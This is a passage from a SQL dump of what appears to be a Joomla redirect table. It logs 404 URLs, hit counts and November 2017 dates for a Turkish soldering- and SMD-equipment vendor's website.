00:00:00',301),(13477,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',17,0,'2017-11-23 16:59:15','0000-00-00 00:00:00',301),(13478,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_name/results,1-50?language=en-gb',NULL,'','',1,0,'2017-11-23 17:31:32','0000-00-00 00:00:00',301),(13479,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',39,0,'2017-11-23 17:40:52','0000-00-00 00:00:00',301),(13480,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-23 17:53:42','0000-00-00 00:00:00',301),(13481,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-23 18:15:25','0000-00-00 00:00:00',301),(13482,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-23 18:18:39','0000-00-00 00:00:00',301),(13483,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-23 18:20:45','0000-00-00 00:00:00',301),(13484,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',24,0,'2017-11-23 18:22:51','0000-00-00 00:00:00',301),(13485,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-23 18:36:06','0000-00-00 00:00:00',301),(13486,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2017-11-23 18:41:46','0000-00-00 00:00:00',301),(13487,'http://www.3s-technologies.com.tr/tr/urunler/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-23 18:55:46','0000-00-00 00:00:00',301),(13488,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-23 18:59:19','0000-00-00 00:00:00',301),(13489,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-23 19:07:26','0000-00-00 00:00:00',301),(13490,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',8,0,'2017-11-23 19:28:35','0000-00-00 00:00:00',301),(13491,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-23 19:39:45','0000-00-00 00:00:00',301),(13492,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-23 19:51:22','0000-00-00 00:00:00',301),(13493,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı',NULL,'','',422,0,'2017-11-23 20:00:51','0000-00-00 00:00:00',301),(13494,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',211,0,'2017-11-23 20:06:39','0000-00-00 00:00:00',301),(13495,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',9,0,'2017-11-23 20:08:44','0000-00-00 00:00:00',301),(13496,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/dirdesc/results,1-10',NULL,'','',5,0,'2017-11-23 20:09:34','0000-00-00 00:00:00',301),(13497,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-20',NULL,'','',2,0,'2017-11-23 20:27:07','0000-00-00 00:00:00',301),(13498,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',22,0,'2017-11-23 20:34:47','0000-00-00 00:00:00',301),(13499,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/mirae-mx_400_s_250x250.gif',NULL,'','',2,0,'2017-11-23 20:36:06','0000-00-00 00:00:00',301),(13500,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-23 20:37:35','0000-00-00 00:00:00',301),(13501,'http://3s-technologies.com.tr/index.php/en/products/ly-8c-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-23 20:44:38','0000-00-00 00:00:00',301),(13502,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,ordering/results,1-50?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-23 20:44:41','0000-00-00 00:00:00',301),(13503,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-23 21:19:48','0000-00-00 00:00:00',301),(13504,'http://3s-technologies.com.tr/en/home2/79-english-uk?format=feed&type=rss',NULL,'','',1,0,'2017-11-23 21:29:35','0000-00-00 00:00:00',301),(13505,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',25,0,'2017-11-23 21:33:00','0000-00-00 00:00:00',301),(13506,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/results,1-5',NULL,'','',7,0,'2017-11-23 21:37:22','0000-00-00 00:00:00',301),(13507,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hä±z/by,category_name',NULL,'','',2,0,'2017-11-23 21:53:54','0000-00-00 00:00:00',301),(13508,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,ordering/results,1-20?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-23 22:03:42','0000-00-00 00:00:00',301),(13509,'http://3s-technologies.com.tr/tr/images/urunler/t_mi300.jpg',NULL,'','',23,0,'2017-11-23 22:19:03','0000-00-00 00:00:00',301),(13510,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-23 22:38:50','0000-00-00 00:00:00',301),(13511,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ls60v_250x250.gif',NULL,'','',4,0,'2017-11-23 22:54:07','0000-00-00 00:00:00',301),(13512,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-23 22:59:36','0000-00-00 00:00:00',301),(13513,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-50',NULL,'','',4,0,'2017-11-23 23:05:10','0000-00-00 00:00:00',301),(13514,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/dirdesc',NULL,'','',9,0,'2017-11-23 23:08:17','0000-00-00 00:00:00',301),(13515,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-23 23:15:06','0000-00-00 00:00:00',301),(13516,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,ordering/results,1-10?language=en-gb&filter_product=',NULL,'','',5,0,'2017-11-23 23:22:43','0000-00-00 00:00:00',301),(13517,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc/results,1-50',NULL,'','',11,0,'2017-11-23 23:31:30','0000-00-00 00:00:00',301),(13518,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-23 23:47:28','0000-00-00 00:00:00',301),(13519,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name',NULL,'','',16,0,'2017-11-23 23:47:44','0000-00-00 00:00:00',301),(13520,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',11,0,'2017-11-24 00:06:51','0000-00-00 00:00:00',301),(13521,'http://www.3s-technologies.com.tr/en/products/smd-fä±rä±n/ly-8c-detail',NULL,'','',1,0,'2017-11-24 00:09:23','0000-00-00 00:00:00',301),(13522,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',157,0,'2017-11-24 00:24:31','0000-00-00 00:00:00',301),(13523,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-5?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-24 00:32:58','0000-00-00 00:00:00',301),(13524,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_name/dirdesc?language=tr-tr',NULL,'','',6,0,'2017-11-24 00:45:28','0000-00-00 00:00:00',301),(13525,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/results,1-100',NULL,'','',6,0,'2017-11-24 00:50:32','0000-00-00 00:00:00',301),(13526,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-24 00:59:19','0000-00-00 00:00:00',301),(13527,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/results,1-5',NULL,'','',9,0,'2017-11-24 01:16:52','0000-00-00 00:00:00',301),(13528,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-24 01:23:34','0000-00-00 00:00:00',301),(13529,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name',NULL,'','',35,0,'2017-11-24 01:25:43','0000-00-00 00:00:00',301),(13530,'http://www.3s-technologies.com.tr/index.php/en/products/cm-602-l-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-11-24 01:36:52','0000-00-00 00:00:00',301),(13531,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-50?language=en-gb&filter_product=',NULL,'','',7,0,'2017-11-24 01:52:00','0000-00-00 00:00:00',301),(13532,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name',NULL,'','',19,0,'2017-11-24 02:08:52','0000-00-00 00:00:00',301),(13533,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/results,1-50',NULL,'','',4,0,'2017-11-24 02:09:33','0000-00-00 00:00:00',301),(13534,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-24 02:13:46','0000-00-00 00:00:00',301),(13535,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,category_name',NULL,'','',47,0,'2017-11-24 02:17:03','0000-00-00 00:00:00',301),(13536,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/rl132-detail',NULL,'','',20,0,'2017-11-24 02:19:40','0000-00-00 00:00:00',301),(13537,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-24 02:19:57','0000-00-00 00:00:00',301),(13538,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-24 02:20:01','0000-00-00 00:00:00',301),(13539,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-24 02:21:11','0000-00-00 00:00:00',301),(13540,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-24 02:22:08','0000-00-00 00:00:00',301),(13541,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_sku',NULL,'','',2,0,'2017-11-24 02:24:11','0000-00-00 00:00:00',301),(13542,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-24 02:26:17','0000-00-00 00:00:00',301),(13543,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-24 02:27:11','0000-00-00 00:00:00',301),(13544,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-24 02:28:23','0000-00-00 00:00:00',301),(13545,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-24 02:28:26','0000-00-00 00:00:00',301),(13546,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',7,0,'2017-11-24 02:29:00','0000-00-00 00:00:00',301),(13547,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?error=404&language=en-gb&mf_name',NULL,'','',1,0,'2017-11-24 02:29:03','0000-00-00 00:00:00',301),(13548,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/dirdesc/results,1-10',NULL,'','',11,0,'2017-11-24 02:39:33','0000-00-00 00:00:00',301),(13549,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',218,0,'2017-11-24 02:52:26','0000-00-00 00:00:00',301),(13550,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',6,0,'2017-11-24 02:53:18','0000-00-00 00:00:00',301),(13551,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-20?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-24 02:54:32','0000-00-00 00:00:00',301),(13552,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-20-detail',NULL,'','',10,0,'2017-11-24 03:16:37','0000-00-00 00:00:00',301),(13553,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-24 03:18:58','0000-00-00 00:00:00',301),(13554,'https://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-24 03:20:40','0000-00-00 00:00:00',301),(13555,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,category_name?language=tr-tr',NULL,'','',30,0,'2017-11-24 03:29:12','0000-00-00 00:00:00',301),(13556,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',216,0,'2017-11-24 03:34:34','0000-00-00 00:00:00',301),(13557,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,ordering?language=tr-tr',NULL,'','',14,0,'2017-11-24 03:43:23','0000-00-00 00:00:00',301),(13558,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-24 03:44:46','0000-00-00 00:00:00',301),(13559,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,ordering?language=en-gb',NULL,'','',14,0,'2017-11-24 03:46:58','0000-00-00 00:00:00',301),(13560,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/dirdesc/results,1-50',NULL,'','',8,0,'2017-11-24 03:47:02','0000-00-00 00:00:00',301),(13561,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',231,0,'2017-11-24 03:50:55','0000-00-00 00:00:00',301),(13562,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-5',NULL,'','',10,0,'2017-11-24 04:02:02','0000-00-00 00:00:00',301),(13563,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/results,1-10',NULL,'','',13,0,'2017-11-24 04:09:32','0000-00-00 00:00:00',301),(13564,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-10?language=en-gb&filter_product=',NULL,'','',1,0,'2017-11-24 04:17:02','0000-00-00 00:00:00',301),(13565,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/jvk-detail',NULL,'','',51,0,'2017-11-24 04:21:21','0000-00-00 00:00:00',301),(13566,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-33-34-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-24 04:49:47','0000-00-00 00:00:00',301),(13567,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-24 05:09:32','0000-00-00 00:00:00',301),(13568,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-24 05:12:19','0000-00-00 00:00:00',301),(13569,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,ordering/results,1-10?language=en-gb&filter_product=',NULL,'','',6,0,'2017-11-24 05:17:02','0000-00-00 00:00:00',301),(13570,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',24,0,'2017-11-24 05:21:29','0000-00-00 00:00:00',301),(13571,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-24 05:31:27','0000-00-00 00:00:00',301),(13572,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name?language=en-gb',NULL,'','',18,0,'2017-11-24 05:34:21','0000-00-00 00:00:00',301),(13573,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-24 05:36:45','0000-00-00 00:00:00',301),(13574,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_sku',NULL,'','',11,0,'2017-11-24 05:54:06','0000-00-00 00:00:00',301),(13575,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',8,0,'2017-11-24 06:09:32','0000-00-00 00:00:00',301),(13576,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-24 06:10:00','0000-00-00 00:00:00',301),(13577,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',55,0,'2017-11-24 06:15:11','0000-00-00 00:00:00',301),(13578,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-24 06:42:36','0000-00-00 00:00:00',301),(13579,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer?language=en-gb',NULL,'','',1,0,'2017-11-24 06:45:51','0000-00-00 00:00:00',301),(13580,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,ordering/results,1-20?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-24 06:47:02','0000-00-00 00:00:00',301),(13581,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-24 06:53:54','0000-00-00 00:00:00',301),(13582,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-24 07:02:02','0000-00-00 00:00:00',301),(13583,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-25_250x250.jpg',NULL,'','',2,0,'2017-11-24 07:02:34','0000-00-00 00:00:00',301),(13584,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-20',NULL,'','',3,0,'2017-11-24 07:17:02','0000-00-00 00:00:00',301),(13585,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-24 07:21:02','0000-00-00 00:00:00',301),(13586,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_sku?language=tr-tr',NULL,'','',14,0,'2017-11-24 07:33:58','0000-00-00 00:00:00',301),(13587,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-10',NULL,'','',5,0,'2017-11-24 07:54:32','0000-00-00 00:00:00',301),(13588,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,category_name',NULL,'','',380,0,'2017-11-24 07:59:57','0000-00-00 00:00:00',301),(13589,'http://www.3s-technologies.com.tr/en/products/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',6,0,'2017-11-24 08:00:12','0000-00-00 00:00:00',301),(13590,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name?language=en-gb',NULL,'','',3,0,'2017-11-24 08:09:32','0000-00-00 00:00:00',301),(13591,'http://3s-technologies.com.tr/index.php/en/products/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-24 08:09:42','0000-00-00 00:00:00',301),(13592,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-24 08:11:12','0000-00-00 00:00:00',301),(13593,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-vertical-gallery/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-vertical-gallery/readme.txt','',8,0,'2017-11-24 08:22:16','0000-00-00 00:00:00',301),(13594,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',9,0,'2017-11-24 08:38:09','0000-00-00 00:00:00',301),(13595,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-24 08:46:07','0000-00-00 00:00:00',301),(13596,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-20',NULL,'','',3,0,'2017-11-24 08:47:01','0000-00-00 00:00:00',301),(13597,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-24 08:54:31','0000-00-00 00:00:00',301),(13598,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-20?language=en-gb&filter_product=',NULL,'','',1,0,'2017-11-24 09:17:03','0000-00-00 00:00:00',301),(13599,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın',NULL,'','',336,0,'2017-11-24 09:20:25','0000-00-00 00:00:00',301),(13600,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',7,0,'2017-11-24 09:39:32','0000-00-00 00:00:00',301),(13601,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-24 09:54:31','0000-00-00 00:00:00',301),(13602,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-24 09:57:08','0000-00-00 00:00:00',301),(13603,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',13,0,'2017-11-24 09:57:21','0000-00-00 00:00:00',301),(13604,'http://www.3s-technologies.com.tr/index.php/en/products/cs40-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-24 09:59:52','0000-00-00 00:00:00',301),(13605,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-24 10:01:10','0000-00-00 00:00:00',301),(13606,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-10',NULL,'','',1,0,'2017-11-24 10:02:01','0000-00-00 00:00:00',301),(13607,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-24 10:04:23','0000-00-00 00:00:00',301),(13608,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc',NULL,'','',2,0,'2017-11-24 10:13:47','0000-00-00 00:00:00',301),(13609,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-50?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-24 10:17:01','0000-00-00 00:00:00',301),(13610,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/results,1-5',NULL,'','',3,0,'2017-11-24 10:27:51','0000-00-00 00:00:00',301),(13611,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-detail',NULL,'','',26,0,'2017-11-24 10:37:07','0000-00-00 00:00:00',301),(13612,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,ordering',NULL,'','',13,0,'2017-11-24 10:47:01','0000-00-00 00:00:00',301),(13613,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-24 11:02:02','0000-00-00 00:00:00',301),(13614,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,product_sku',NULL,'','',4,0,'2017-11-24 11:39:31','0000-00-00 00:00:00',301),(13615,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',2,0,'2017-11-24 11:47:01','0000-00-00 00:00:00',301),(13616,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-24 11:49:11','0000-00-00 00:00:00',301),(13617,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-24 11:49:36','0000-00-00 00:00:00',301),(13618,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-24 11:55:20','0000-00-00 00:00:00',301),(13619,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/ess-310-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-24 11:57:48','0000-00-00 00:00:00',301),(13620,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',56,0,'2017-11-24 11:57:48','0000-00-00 00:00:00',301),(13621,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-24 12:06:37','0000-00-00 00:00:00',301),(13622,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',17,0,'2017-11-24 12:16:20','0000-00-00 00:00:00',301),(13623,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/results,1-20',NULL,'','',2,0,'2017-11-24 12:17:01','0000-00-00 00:00:00',301),(13624,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-24 12:24:31','0000-00-00 00:00:00',301),(13625,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-5?language=en-gb',NULL,'','',2,0,'2017-11-24 12:45:41','0000-00-00 00:00:00',301),(13626,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1mm-28-detail',NULL,'','',26,0,'2017-11-24 12:59:16','0000-00-00 00:00:00',301),(13627,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name',NULL,'','',35,0,'2017-11-24 13:15:42','0000-00-00 